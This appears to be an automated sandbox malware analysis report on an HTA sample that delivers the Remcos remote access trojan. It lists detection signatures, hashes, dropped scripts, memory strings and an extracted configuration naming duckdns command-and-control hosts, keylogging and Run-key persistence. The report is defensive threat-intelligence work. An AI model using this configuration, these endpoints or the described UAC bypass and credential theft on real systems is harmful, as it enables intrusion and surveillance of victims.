Windows Analysis Report
creatingbestthingsforhisbeststepstotakehim.hta

Overview

General Information

Sample name:	creatingbestthingsforhisbeststepstotakehim.hta
Analysis ID:	1649128
MD5:	287ddf351810cc030f2eca5307052023
SHA1:	abb6b50f27d0830aa932a21c038a132bc3a34242
SHA256:	64a04162d4e39030d2bcf514422cac3b97c52fc5f5560389ebba76dc069fe126
Tags:	htauser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Yara detected VBS Downloader Generic

C2 URLs / IPs found in malware configuration

Command shell drops VBS files

Connects to a pastebin service (likely for C&C)

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Injects a PE file into a foreign processes

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Legitimate Application Dropped Script

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Script Initiated Connection

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Found malware configuration

Source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["hftook7lmaroutsg1.duckdns.org:3980:0", "hftook7lmaroutsg1.duckdns.org:3981:1", "hftook7lmaroutsg2.duckdns.org:3980:0", "hftook7lmaroutsg3.duckdns.org:3980:0", "hftook7lmaroutsg4.duckdns.org:3980:0", "hftook7lmaroutsg5.duckdns.org:3980:0"], "Assigned name": "Last", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kmbgnrgsd-N2XF5V", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "jasgbtisot.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}

Multi AV Scanner detection for submitted file

Source: creatingbestthingsforhisbeststepstotakehim.hta	Virustotal: Detection: 23%			Perma Link
Source: creatingbestthingsforhisbeststepstotakehim.hta	ReversingLabs: Detection: 19%

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jasgbtisot.dat, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.5%

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

8_2_00433B64

Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_621c287e-5

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00406ABC _wcslen,CoGetObject,

8_2_00406ABC

Source: unknown

HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49692 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbase source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `2dnlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.
Source:	Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype( source: powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflags source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp

Spreading

Yara detected VBS Downloader Generic

Source: Yara match	File source: C:\Windows\Temp\anonymiser.bat, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\Sheena.vbs, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	8_2_004090DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	8_2_0041C7E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_0040B8BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0044E989 FindFirstFileExA,	8_2_0044E989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	8_2_00408CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	8_2_00419CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	8_2_00407EDD
